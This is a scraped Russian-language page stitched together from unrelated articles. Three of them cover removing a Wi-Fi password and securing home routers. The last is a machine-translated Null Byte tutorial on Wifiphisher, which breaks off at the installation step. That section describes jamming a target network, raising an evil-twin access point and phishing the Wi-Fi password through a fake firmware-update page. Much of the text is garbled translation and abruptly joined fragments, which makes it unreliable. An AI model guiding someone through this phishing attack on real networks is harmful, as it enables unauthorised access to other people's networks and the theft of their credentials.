Как убрать пароль с Wi-Fi: способы открытия сети
Пароль на Wi-Fi используется для защиты доступа. Но происходят случаи, когда нужно код убрать. Например, если проводится вечеринка или торжество, и в доме полно гостей. Чтобы не возиться с большим количеством информации, проще на время убрать пароль с роутера «вай фай».
Этот процесс несложный, справится даже неопытный пользователь.
Нужно лишь выполнять шаги по инструкции. Перед отключением важно ознакомиться с вероятными рисками и угрозами, рекомендуется не держать долго Wi-Fi без установленного пароля.
Возможные последствия
Отключая пароль от Wi-Fi, нужно помнить о последствиях, с которым столкнется пользователь:
- Любой человек, находящийся в зоне действия, способен подключиться к интернету, поэтому нагрузка на модем будет выше.
- Каждый, кто подсоединился, может изменить настроенные параметры маршрутизатора. При условии, что злоумышленнику известны учетные данные.
- Скорость трафика упадет, вероятны зависания и пропадание связи.
- Для сохранения данных на компьютере в «Центре управления сетью и общим доступом» нужно убрать статус «Общественная», запаролить доступ к файлам и папкам.
С помощью некоторых функций модема уменьшается негативное влияние, а также есть шанс его убрать вовсе.
Как убрать основные риски, связанные с открытой Wi-Fi-сетью
Защититься от неблагоприятных последствий поможет гостевая «сетка» или установка пароля на файлы с личными данными. Рассмотрим этот момент подробнее.
Использование гостевой сети
Эта функция – лучший вариант для устройств. Гостевой называется беспроводная локальная сеть, отделенная от основной Wi-Fi. Приборы от разных сетей не обнаруживают друг друга, что позволяет избежать риска заражения вирусом.
Устанавливая параметры, выбираем максимальное количество подключаемых устройств, ограничиваем скорость. Данная функция реализуется не на всех модемах.
Если гостевая сеть недоступна
При невозможности создать гостевую «сетку» защитить свои данные можно паролем. Установить пароль следует на вход в «Настройки» роутера, чтобы другие люди не изменили их. А также снять общий доступ к хранящейся информации на ПК: файлам, папкам.
Старые компьютеры некорректно работают с беспроводным подключением к интернету. По этой причине требуется разрешить маршрутизатору соединение только с девайсами, чей MAC-адрес прописан в роутере. Задаются адреса в настройках роутера.
Как отключить защиту
После выполнения всех шагов, защищающих персональную информацию на ноутбуке или компьютере и параметры маршрутизатора, защита убирается.
Важно! Если понадобится с «вайфай» удалить пароль, лучше сменить имя — SSID. Если этого не сделать, компьютер будет пытаться связать название с предыдущими установками, что вызовет трудности в подключении.
С роутера TP-Link предлагаем убрать защиту следующим образом:
- Заходим в «Настройки» маршрутизатора, введя в поисковую строку браузера http://192.168.1.1 или http://192.168.0.1, указав логин и пароль.
- Далее — во вкладку Wireless – Wireless Security/«Защита беспроводного режима».
- Поставить галочку напротив Disable Security «Отключить защиту».
- Нажать кнопку Save/ «Сохранить».
Для устройств фирмы Asus отключить пароль на роутере возможно, если следовать алгоритму:
- Перейти в «Настройки».
- На главном экране нажать Open system и применить.
Для приборов фирмы D-Link действуем аналогично: после открытия «Настроек» перейти во вкладку Wi-Fi в «Настройки безопасности». В списке появится пункт «Сетевая аутентификация», следует выбрать Open и применить.
Убрать пароль с Wi Fi-роутера другой фирмы можно таким же способом, различаются лишь названия функций и их местоположение. Чтобы снова защитить доступ в интернет, нужно вернуть измененные пункты настроек на начальные значения и перезагрузить девайс. Важно также убрать новое имя и вернуть первоначальное название Wi-Fi.
Подгорнов Илья ВладимировичВсё статьи нашего сайта проходят аудит технического консультанта. Если у Вас остались вопросы, Вы всегда их можете задать на его странице.Как снять защиту с вай фай роутера
Как снять пароль с Wi-Fi роутера и советы по защите сети
Отменяя пароль для подключения к точке доступа Wi-Fi, вы создаете много рисков со стороны безопасности и конфиденциальности данных. В статье вы узнаете, как снять пароль с Вай-Фай роутера и определите для себя, стоит ли это того.
Инструкция
Снять пароль, и по совместительству защиту, просто. После инструкции вы узнаете последствия и способы защиты подключенных устройств к сети без ключа безопасности.
Как убрать пароль Wi-Fi с роутера (на примере TP–Link):
- В адресной строке браузера введите адрес доступа к настройкам роутера. Обычно это IP адрес 192.168.1.1 или 0.1 в конце.
- Пропишите логин и пароль (admin, admin). Вся информация указана на корпусе маршрутизатора.
- Перейдите в раздел Wi-Fi или беспроводной режим. Откройте раздел с «защитой».
- Выберите вариант «Отключить защиту».
- Жмите «ОК».
- Перезагрузите маршрутизатор для применения изменений.
Как отключить пароль на роутере D-Link, рассказывается в следующем видео:
После этого рекомендуется ознакомиться с последствиями и возможными рисками!
Точка доступа без защиты: особенности
Основное удобство подключения к Wi-Fi без защиты – не требуется пароль. Но есть и обратная сторона медали:
- Подключиться может любой пользователь. Если активирована функция открытого вещания роутера (видимость названия Wi-Fi сети), любое устройство в зоне доступа сможет подключиться к ней. Это создаст дополнительную нагрузку на роутер.
- Если вход в учетную запись роутера стоит по умолчанию (admin, admin), любой подключившийся к локалке человек сможет зайти в веб-панель и изменить параметры так, как ему вздумается. Опытные злоумышленники могут использовать Wi-Fi без защиты в собственных «черных схемах» или «прослушивать» ваш трафик.
- Халяву любят все, поэтому ждите приток множества устройств и нагрузку на маршрутизатор, с последующим падением Download и Upload.
Но есть решения, позволяющие оставить точку доступа без защиты и защитить по крайней мере свои данные.
Закрытие конфиденциальной информации
Есть такой параметр в маршрутизаторах, как гостевой доступ. Гостевая сеть позволяет отделить Wi-Fi без защиты от основной сети. То есть, любой подключившийся гаджет к Wi-Fi без пароля сможет выйти в интернет, но не увидит все ваши устройства, подключенные к основной сети.
Данная функция должна поддерживаться маршрутизатором!
Если же подобной функции в роутере нет, а создать сеть без пароля необходимо, на компьютерах с операционной системой Windows нужно выбрать соответствующие параметры сети:
- Нажмите Win+I и перейдите в раздел «Сеть и Интернет».
- В разделе Wi-Fi нажмите «Изменить свойства подключения».
- Переместите указатель с частной на «Общедоступные».
В настройках роутера изменить стандартные логин и пароль:
- В веб-интерфейсе роутера откройте раздел «Системные инструменты».
- Переместитесь к окну «Пароль».
- Обновите данные со стандартных на персонализированные.
- Жмите «Сохранить».
При проведении рисковых операций (например, оплата заказа и ввод реквизитов карты) включите VPN и проводите их через нее.
Альтернативы авторизации без пароля
Способы подключения к точке доступа без ввода ключа безопасности описаны в следующем видео:
Есть две альтернативные настройки для подключения устройств к Wi-Fi без ввода пароля: установка фильтра по MAC-адресу и соединение по WPS.
Фильтр по MAC-адресу разрешает авторизовать устройства в сети без ввода пароля, если однажды ввести их MAC-адрес в фильтр разрешенных устройств. Чтобы это сделать:
- В настройках роутера откройте «Беспроводной режим».
- Зайдите в раздел «Фильтрация MAC-адресов».
- Нажмите «Добавить новую…».
- Правила фильтрации выберите «Разрешить».
- Саму фильтрацию включите.
Найти MAC адреса можно так:
- В Windows зайдите в командную строку и введите getmac /v /fo list. Выведутся все используемые адаптеры и подвязанные к ним MAC-адреса. Вам нужен MAC-адрес Wi-Fi адаптера.
- В смартфоне Android зайдите в настройки и пролистайте до последнего пункта «Система» – «О телефоне». Перейдите в раздел «Общая информация» и обратите внимание на строчку «Mac-адрес Wi-Fi».
WPS позволяет подключаться к защищенной сети с паролем через специальную функцию. Чтобы это сделать, нужно нажать на кнопку WPS на самом роутере и в течение двух минут активировать эту функцию на самом устройстве.
В Windows 10 это делается так:
- Найдите нужную сеть и нажмите присоединиться.
- На маршрутизаторе нажмите
- Ждите соединения и пользуйтесь подключенной сетью.
Для Android:
- Откройте поиск сетей Wi-Fi и перейдите в «Настройки Wi-Fi».
- Выберите раздел «WPS-соединение».
- Нажмите соответствующую кнопку на роутере и ожидайте подключения.
- Готово. Используйте защищенную сеть по назначению.
Заключение
Чтобы удалить пароль Вай-Фай, достаточно отключить в параметрах роутера защиту. Но при этом желательно подумать о том, как осуществится защита сети и подключенных к ней устройств. Есть способы обеспечения безопасности в открытой Wi-Fi сети и альтернативные методы подключения к Wi-Fi без пароля.
12 шагов к максимальной безопасности домашней беспроводной сети
Проще говоря, базовая домашняя беспроводная сеть означает подключение точки доступа к Интернету, например кабеля от вашего интернет-провайдера, к (беспроводному) маршрутизатору, чтобы несколько устройств могли очень быстро подключаться к сети. .
Источник: Компьютерная революция
Во многих случаях после установки беспроводного маршрутизатора мы находим для него место в нашем доме и забываем о нем.Пока все наши устройства настроены и подключены через сеть Wi-Fi, это все, что имеет значение, верно? Неправильно!
Возможно, многие из вас не осознают, но интернет-маршрутизатор — одно из самых важных устройств в нашем доме. Это шлюз к нашему доступу в Интернет, который также подвержен атакам киберпреступников, которые могут проникнуть на наши устройства и получить доступ к нашей системе.
Давайте не будем забывать, что мы живем в эпоху утечек данных, атак программ-вымогателей, и многих других онлайн-угроз.Таким образом, вам следует побеспокоиться о безопасности своей домашней сети и принять все необходимые меры безопасности для повышения безопасности Wi-Fi.
Единственная мера, которую большинство людей использует для защиты своей домашней сети, — это установка пароля и предотвращение доступа соседей и других людей к вашим данным. Но мы должны более серьезно относиться к безопасности, и делает больше, чем просто устанавливает простой пароль . Серьезный риск заключается в том, что онлайн-преступник может использовать ваши слабые меры безопасности Wi-Fi и «прослушивать» ваш трафик, чтобы получить конфиденциальную информацию или воспользоваться вашей сетью для запуска вредоносных атак , таких как Man-in-the -Средние атаки , сниффинг сети или кража данных .
Хотя сети Wi-Fi относительно просты в использовании и доступе, они не всегда являются БЕЗОПАСНЫМИ сетями . Wi-Fi имеет множество проблем с безопасностью, и стоит напомнить об уязвимости Krack , обнаруженной в протоколе Wireless Protected Access II (WPA2), которая затронула все устройства, подключенные через Wi-Fi.
По этой причине изучение того, как защитить свою беспроводную домашнюю сеть от киберпреступников, является мудрым и разумным шагом. Учитывая, сколько устройств Интернета вещей у вас может быть, обеспечение максимальной безопасности вашей сети имеет еще больший вес, хотя иногда забота о вашей кибербезопасности может быть утомительной, но необходимой задачей .
Из этой статьи вы узнаете, как повысить безопасность своей домашней сети и снизить вероятность компрометации ваших ценных данных.
Выполните следующие действия, чтобы повысить безопасность домашней беспроводной сети:
Шаг 1. Измените имя вашей домашней сети по умолчаниюЕсли вы хотите лучше защитить свою домашнюю сеть, первое, что вам следует сделать, это изменить имя вашей сети Wi-Fi, также известное как SSID (идентификатор набора услуг).
Если дать вашему Wi-Fi несколько провокационное название, такое как «Не могу взломать», это может иметь неприятные последствия, другие имена, такие как «это не Wi-Fi» или «слишком летать для Wi-Fi», вполне приемлемы.
При изменении имени Wi-Fi по умолчанию злоумышленникам будет сложнее узнать, какой у вас тип маршрутизатора. Если киберпреступник знает название производителя вашего маршрутизатора, он узнает, какие уязвимости имеет эта модель, и затем попытается их использовать.
Мы настоятельно не рекомендуем называть вашу домашнюю сеть чем-то вроде «Wi-Fi Джона».Вы же не хотите, чтобы они с первого взгляда знали, какая беспроводная сеть принадлежит вам, когда, вероятно, есть еще три или четыре других Wi-Fi.
Также помните, что , раскрывающее слишком много личной информации в имени беспроводной сети, может подвергнуть вас операции кражи личных данных .
Вот пошаговое и простое руководство , в котором объясняется, как легко изменить имя беспроводной сети.
Шаг 2.Убедитесь, что вы установили надежный и уникальный пароль для защиты беспроводной сетиВы, вероятно, знаете, что каждый беспроводной маршрутизатор поставляется с предварительно заданными именем пользователя и паролем по умолчанию , которые необходимы в первую очередь для установки и подключения вашего маршрутизатора. Хуже всего то, что хакерам легко угадать это, особенно если они знают производителя.
Итак, убедитесь, что вы немедленно заменили их оба.
Хороший пароль беспроводной сети должен быть длиной не менее 20 символов и включать цифры, буквы и различные символы .
Используйте это руководство , чтобы установить надежный пароль для вашей сети. Друзья, приходящие в гости, могут жаловаться на необычную длину вашего пароля, но это может помешать им без нужды использовать ваши данные в скучных публикациях в Facebook или Instagram.
Шаг 3. Повысьте безопасность Wi-Fi, активировав сетевое шифрованиеБеспроводные сети имеют несколько языков шифрования, таких как WEP, WPA или WPA2.
Чтобы лучше понять эту терминологию, WPA2 означает Wi-Fi Protected Access 2 и одновременно является протоколом безопасности и текущим стандартом в отрасли (сети WPA2 есть почти везде) и шифрует трафик в сетях Wi-Fi.Он также заменяет более старую и менее безопасную WEP (Wired Equivalent Privacy) и является обновлением исходной технологии WPA (Wi-Fi Protected Access). С 2006 года все сертифицированные продукты Wi-Fi должны использовать защиту WPA2.
WPA2 AES теперь также является стандартной системой безопасности, поэтому все беспроводные сети совместимы с ней. Если вы хотите включить шифрование WPA2 на беспроводном маршрутизаторе, выполните следующие шесть шагов . Если вы используете беспроводной маршрутизатор TP-Link , вот как защитить свою беспроводную сеть.
Хорошая новость заключается в том, что и WPA3 уже здесь и заменят WPA2. Wi-Fi Alliance недавно объявил о своем стандарте безопасности беспроводных сетей следующего поколения, который призван решить общую проблему безопасности: открытые сети Wi-Fi. Более того, он поставляется с усовершенствованиями безопасности и включает набор функций, упрощающих настройку безопасности Wi-Fi для пользователей и поставщиков услуг.
Шаг 4. Выключайте беспроводную домашнюю сеть, когда вас нет домаДля защиты вашей сети мы настоятельно рекомендуем вам t o отключить беспроводную домашнюю сеть на случай длительного простоя.Вы должны сделать то же самое с для всех своих устройств , которые используют кабели Ethernet или когда вас нет дома.
Тем самым вы закрываете все окна возможностей, когда злоумышленники могут попытаться получить к нему доступ, пока вас нет.
Вот несколько преимуществ отключения беспроводной сети:
- Причины безопасности — Отключение сетевых устройств сводит к минимуму шансы стать целью хакеров.
- Защита от скачков напряжения — Когда вы выключаете сетевое устройство, вы также снижаете вероятность его повреждения скачками напряжения;
- Шумоподавление — Хотя современные домашние сети в наши дни намного тише, отключение беспроводной домашней сети может добавить спокойствия вашему дому.
Вы, вероятно, не задумывались об этом вначале, но , где у вас дома Wi-Fi , также может повлиять на вашу безопасность.
Разместите беспроводной маршрутизатор как можно ближе к центру дома . Зачем? Прежде всего, это обеспечит равный доступ к Интернету для всех комнат в вашем доме. Во-вторых, вы не хотите, чтобы радиус действия беспроводного сигнала был слишком большим за пределами вашего дома, где он может быть легко перехвачен злоумышленниками.
По этой причине мы не рекомендуем размещать беспроводной маршрутизатор близко к окну, поскольку ничто не может блокировать выход сигнала за пределы вашего дома.
Шаг 6. Используйте надежный пароль администратора сети для повышения безопасности Wi-FiДля настройки беспроводного маршрутизатора обычно требуется доступ к онлайн-платформе или сайту, где вы можете внести несколько изменений в настройки сети.
Большинство маршрутизаторов Wi-Fi поставляются с учетными данными по умолчанию, такими как «admin» и «password» , которые очень легко взломать злоумышленникам.
Знаете ли вы, что количество беспроводных сетей резко увеличилось за последние 8 лет? В 2010 году в мире насчитывалось 20 миллионов сетей Wi-Fi, и за 8 года, это число увеличилось с до 400 миллионов.
Смартфоны, ноутбуки, планшеты и другие устройства стимулировали этот рост, и из-за дороговизны тарифных планов большинство людей предпочитают подключать свое устройство к беспроводному Интернет-соединению .
Шаг 7. Измените IP-адрес по умолчанию на беспроводном маршрутизатореИзменение IP-адреса по умолчанию на менее распространенный — это еще одна вещь, которую вам следует рассмотреть, чтобы лучше защитить свою домашнюю сеть и усложнить ее отслеживание хакерами.
Чтобы изменить IP-адрес маршрутизатора, выполните следующие действия:
- Войдите в консоль маршрутизатора как администратор. Эти основные шаги научат вас, как легко подключиться к домашней сети в качестве администратора. Обычно тип адресной строки выглядит как http://192.168.1.1 или http://192.168.0.1
- Когда вы окажетесь там, введите имя пользователя и пароль на странице входа;
- Затем выберите Сеть> LAN , который находится в меню слева;
- Измените IP-адрес на предпочтительный, затем нажмите Сохранить.
Примечание. После того, как вы изменили IP-адрес, вам нужно будет ввести новый IP-адрес в строку веб-браузера.
Вы также можете изменить DNS-сервер , который ваш беспроводной маршрутизатор использует для фильтрации Интернет-трафика, и в этом руководстве будет показано, как это сделать.
Шаг 8 . Отключить DHCP на роутереДля повышения безопасности беспроводной сети необходимо отключить сервер протокола динамической конфигурации хоста (DHCP) в маршрутизаторе, который определяет IP-адреса, которые назначаются каждому устройству в сети.Вместо этого вам следует использовать статический адрес и ввести настройки сети.
Это означает, что вы должны войти в свое устройство и назначить ему IP-адрес, подходящий для вашего маршрутизатора.
Шаг 9. Отключить Удаленный доступБольшинство маршрутизаторов позволяют получить доступ к их интерфейсу только с подключенного устройства. Однако некоторые из них позволяют доступ даже из удаленных систем.
После того, как вы отключите удаленный доступ, злоумышленники не смогут получить доступ к настройкам конфиденциальности вашего маршрутизатора с устройства, не подключенного к вашей беспроводной сети.
Чтобы внести это изменение, войдите в веб-интерфейс и выполните поиск « Remote access » или « Remote Administration ».
Шаг 10. Всегда обновляйте программное обеспечение маршрутизатораПрограммное обеспечение — важная часть безопасности вашей беспроводной сети. Прошивка беспроводного маршрутизатора, как и любое другое программное обеспечение, содержит уязвимости, которые могут стать серьезной уязвимостью
.Wi-Fi и пароль доступа, WPS, фильтрация MAC- и IP-адресов, удаленный доступ
Прочтите эту статью, чтобы узнать больше о настройках безопасности Wi-Fi для вашего маршрутизатора. Как защитить сеть Wi-Fi от несанкционированного доступа посторонних лиц и установить пароль для доступа к сети Wi-Fi и панели настроек. Как ограничить доступ к вашей сети Wi-Fi с помощью фильтрации MAC или IP-адресов.
Многие пользователи пренебрегают настройкой параметров сетевой безопасности, полагая, что их сеть никого не интересует.Почему злоумышленник пытается получить к нему доступ?
К сожалению, это ложное предположение: правильные настройки безопасности могут защитить вас от кражи личных данных, а также от непреднамеренного ущерба, причиненного другими пользователями вашей сети. Просто из любопытства хакеры могут что-то изменить в ваших настройках, что может оставить вас в автономном режиме. Вот почему мы рекомендуем проверить настройки безопасности прямо сейчас.
Я покажу вам, как настроить параметры безопасности роутера на примере популярной модели TP-LINK WR841N.Однако почти все маршрутизаторы имеют схожую функциональность, поэтому данное руководство будет полезно и для других устройств. За исключением, конечно, некоторых отличий в интерфейсе меню.
Содержание:
Изменение логина и пароля для доступа к маршрутизатору.
Первое, что нужно сделать, это изменить пароль по умолчанию, защищающий доступ к настройкам роутера. Такой пароль предотвратит несанкционированный доступ посторонних к вашему роутеру. Таким образом, когда вы измените пароль по умолчанию, никто другой не сможет подключиться к Интернету или изменить настройки сети.
Чтобы изменить имя и пароль маршрутизатора, подключитесь к этому устройству с помощью Wi-Fi или кабеля и откройте браузер, чтобы ввести его сетевой адрес.
Сетевой адрес маршрутизатора указан на наклейке, которая находится в нижней части устройства. Обычно это выглядит как 192.168.1.1 или 192.168.0.1, tplinkwifi.net или tplinklogin.net и т. Д.
В этом окне введите имя пользователя и пароль — по умолчанию это admin и admin. Логин и пароль по умолчанию можно найти на той же наклейке, что и раньше.
Если вы все сделаете правильно, на экране появится меню настроек.
Перейдите на вкладку Системные инструменты и найдите строку Пароль .
Вам нужно будет указать предыдущее имя пользователя и пароль, а затем ввести новые данные и нажать Сохранить. Вот и все — изменен пароль для доступа к роутеру. Вы только что выполнили первую задачу по настройке параметров безопасности. Давайте двигаться дальше.
Установка пароля для Wi-Fi.
Второй важный шаг — установка пароля для доступа к вашей сети Wi-Fi. Это предотвратит подключение посторонних к этой сети.
Многие люди считают, что в этой опции нет необходимости, и поэтому оставляют свои сети открытыми для всех. Однако, подключившись к вашей сети, другие пользователи могут использовать торрент-клиенты для загрузки контента или играть в онлайн-игры, что поглощает трафик и оказывает давление на ваш маршрутизатор. Что касается роутера, у него могут быть разные проблемы, скорость соединения упадет, а общее качество доступа в Интернет ухудшится.
Чтобы изменить пароль, перейдите на вкладку Wireless. Найдите строку Wireless Security.
Если защита беспроводной сети отключена, включите ее. Для этого выберите один из предложенных вариантов. Для стандартных ситуаций будет достаточно рекомендованного варианта WPA / WPA2 .
Введите желаемый пароль в поле Wireless Password.
Не используйте простые пароли, состоящие из восьми цифр 1 или 0 или цифр от 1 до 8.Подумайте о надежном пароле, состоящем из заглавных и строчных букв, цифр и специальных символов. Запишите новый пароль на случай, если вы его забудете.
Прочтите другую статью, где очень подробно описаны другие настройки Wi-Fi.
Отключение функции WPS.
Третий шаг — отключить функцию WPS. Эта функция позволяет быстро и без пароля подключиться к беспроводной сети. В реальной жизни он используется редко, и, поскольку он слишком уязвим для хакеров, я рекомендую отключить его.
Для этого перейдите на вкладку WPS (иногда ее можно найти в меню Wireless ) и выберите Отключить WPS.
Скрытие имени беспроводной сети.
Скройте свою сеть от посторонних глаз. В настройках роутера есть специальная опция, позволяющая скрыть вашу сеть. Когда вы его включите, другие устройства больше не будут видеть ваш Wi-Fi. Для подключения им нужно будет указать не только пароль, но и имя сети (SSID).
Вы можете включить эту функцию в настройках беспроводной сети, сняв флажок рядом с Enable SSID Broadcast.
Когда вы это сделаете, другие устройства не смогут его увидеть, а на компьютере с Windows 10 вы увидите скрытую сеть среди других сетей. Если вы попытаетесь подключиться, вам нужно будет ввести имя сети (SSID), а затем пароль; только если все будет правильно, вы сможете подключиться.
Со смартфона эта сеть просто невидима: для подключения необходимо зайти в настройки W-Fi и создать новую сеть.Укажите имя сети (SSID) и пароль.
Фильтрация устройств по MAC-адресу.
Следующий этап — фильтрация устройств, пытающихся подключиться, по их MAC-адресам.
MAC-адрес — это уникальный идентификатор устройства, так как каждый гаджет имеет свой собственный MAC-адрес. В настройках роутера вы можете добавить MAC-адреса устройств, которым разрешено подключаться к вашей сети. Когда эта функция включена, могут подключаться только устройства из этого списка.В качестве альтернативы вы можете указать устройства, доступ к которым должен быть заблокирован.
Это наиболее эффективный способ защиты вашего маршрутизатора, но он подходит только для организаций с определенным количеством пользователей; однако для домашней сети вам придется подключать новых пользователей, войдя в настройки маршрутизатора и добавив их MAC-адреса, что не слишком удобно.
Чтобы включить эту опцию, откройте Wireless MAC Filtering , который вы можете найти на вкладке Wireless settings.
Когда вы окажетесь там, нажмите Включить и установите флажок рядом с Запретить станции, указанные в любых включенных записях в списке, для доступа к или Разрешить… , затем добавьте MAC-адреса таких устройств.
Чтобы добавить их, щелкните Добавить новый.
Обновление микропрограммы маршрутизатора.
Еще один важный аспект, который необходимо учитывать при настройке параметров безопасности, — это убедиться, что на вашем маршрутизаторе установлена последняя версия прошивки. Он исправит ошибки и исправит возможные уязвимости, которые могут позволить посторонним людям взломать вашу сеть.
Функция обновления прошивки маршрутизатора обычно находится в меню System Tools / Firmware Upgrade.
Последнюю версию пакета можно скачать с официального сайта производителя маршрутизатора. В моем случае это TP-Link. Официальный сайт компании: https://www.tp-link.com.
На веб-сайте перейдите в раздел «Поддержка / загрузка» (https://www.tp-link.com/us/support/download/). И найдите свою модель в списке.
Перед загрузкой прошивки вы должны проверить версию оборудования вашего устройства. Если вы установите прошивку для другой версии, это может повредить устройство или даже вывести его из строя.Версия оборудования указана на наклейке, которая находится на нижней панели маршрутизатора.
Однако вы можете установить стандартную, новую или альтернативную прошивку. Единственное, что имеет значение, это то, что он должен быть совместим с вашим устройством.
Выберите файл и укажите путь к загруженной вами прошивке, а затем нажмите Upgrade.
После завершения процесса маршрутизатор автоматически перезагрузится.
Веб-страницы для загрузки микропрограмм для маршрутизаторов других производителей:
Практически все производители позволяют пользователям загружать микропрограммы для своих маршрутизаторов.Обычно страницу загрузки прошивки можно найти в разделе поддержки на сайте компании.
Отключение удаленного доступа.
Следующее, что нужно настроить — это удаленный доступ. Если у вас включена функция удаленного доступа, но вы не используете ее — отключите ее, потому что такая функция позволяет любому получить доступ к вашему роутеру через Интернет с любого другого устройства. Другими словами, любой пользователь, знающий IP-адрес вашего маршрутизатора (адрес WAN), может получить доступ к его настройкам.
Чтобы отключить эту функцию, перейдите на вкладку Безопасность / Удаленное управление. Введите нули в строку IP-адреса. По умолчанию эта функция отключена.
Чтобы разрешить удаленный доступ для всех, IP-адрес должен выглядеть так: 255.255.255.255.
Выбор времени работы.
В некоторых моделях можно настроить график работы. Например, вы не пользуетесь сетью в ночное время и не хотите, чтобы кто-то подключался. Сделать это можно одним из двух способов: выключив роутер (нажав соответствующую кнопку) или настроив график его работы.
Для этого откройте вкладку Access Control, перейдите в Schedule, и нажмите Add New.
В этом окне вы можете указать дни и время, когда вы хотите, чтобы маршрутизатор работал, и подтвердите свой выбор, нажав Сохранить.
Фильтрация устройств по IP-адресу.
Если вам нужно ограничить доступ в Интернет для определенных компьютеров в сети, используйте функцию ARP. Привязка по протоколу ARP — удобный вариант управления доступом для компьютеров в локальной сети.
Чтобы настроить этот фильтр, вы должны назначить статический IP-адрес каждому компьютеру, подключенному к сети.
На компьютере с Windows 10 откройте «Настройки» / «Сеть и Интернет» / «Изменить параметры адаптера».
Щелкните правой кнопкой мыши свою сеть и выберите Properties. Затем выберите IPv4 и нажмите Properties.
Установите флажок рядом с Используйте следующий IP-адрес и укажите его, а также маску подсети и шлюз по умолчанию.
Чтобы подключить IP-адрес компьютера к определенному MAC-адресу и убедиться, что другие компьютеры не используют этот адрес, включите функцию ARP Binding в настройках маршрутизатора, перейдя на вкладку IP & MAC Binding.
После этого создайте новую запись, нажав кнопку Add New, введите МАС и IP-адреса, установите флажок Bind и нажмите Save. В таблице ARP вы увидите все привязанные устройства.
Теперь, если чей-то другой компьютер (которого нет в этом списке) отправит запрос на установление соединения, доступ будет запрещен.
Проверка наличия странных устройств в списке клиентов, подключенных к маршрутизатору.
Если вы заметили, что объем вашего трафика значительно уменьшился, или вы сомневаетесь, что маршрутизатор работает правильно, проверьте его на наличие каких-либо необычных устройств, которые могут быть подключены.
Для этого откройте вкладку Системные инструменты и перейдите в Статистика. Включите статистику интернет-трафика, нажав соответствующую кнопку.
В таблице вы можете увидеть все подключенные устройства и заметить странные подключения по их IP-адресам.
Все настройки безопасности, которые я показал вам сегодня, не являются обязательными, и каждый может использовать их или нет. Первостепенная задача — обеспечить безопасность маршрутизатора, чтобы никто не мог изменить его настройки и лишить вас подключения к Интернету. Довольно часто единственной необходимой мерой является изменение логина и пароля маршрутизатора, а также установка надежного пароля для сети Wi-Fi.
На этом пока все. Надеюсь, это руководство окажется полезным. Не стесняйтесь оставлять комментарии и задавать вопросы.
.Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo
В то время как взлом паролей и PIN-атаки установки WPS привлекают много внимания, атаки социальной инженерии — безусловно, самый быстрый способ получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не вводят пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.
Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.
Незнание того, насколько надежен пароль, который вы атакуете, может расстраивать, потому что если вы потратите время и вычислительную мощность, необходимые для атаки по словарю или грубой силы, то это может показаться пустой тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.
Знает ли средний пользователь, как выглядит страница входа на его Wi-Fi роутер? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, все равно будет вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?
Вифифишер считает, что ответ — «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого близнеца, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для обновления прошивки, что объясняется причиной того, что Wi-Fi перестал работать.
Обновление прошивки от ада
Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.
Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которой может присоединиться любой. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.
После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно отнеслись к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства снова подключаются к сети, теперь они более безопасны благодаря установленному обновлению.
Easy Access with Bossy Update
Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите нацелить.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети цели клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что ее маршрутизатор работает в каком-то неопределенном режиме обновления.
Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается в соответствии с производителями маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.
Что вам понадобится
Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.
Слева направо, начиная сверху: Alfa AWUS036NH; Альфа AWUS051NH; TP-LINK TL-WN722N; Альфа AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Image by Kody / Null ByteПомимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.
Шаг 1. Установка Wifiphisher
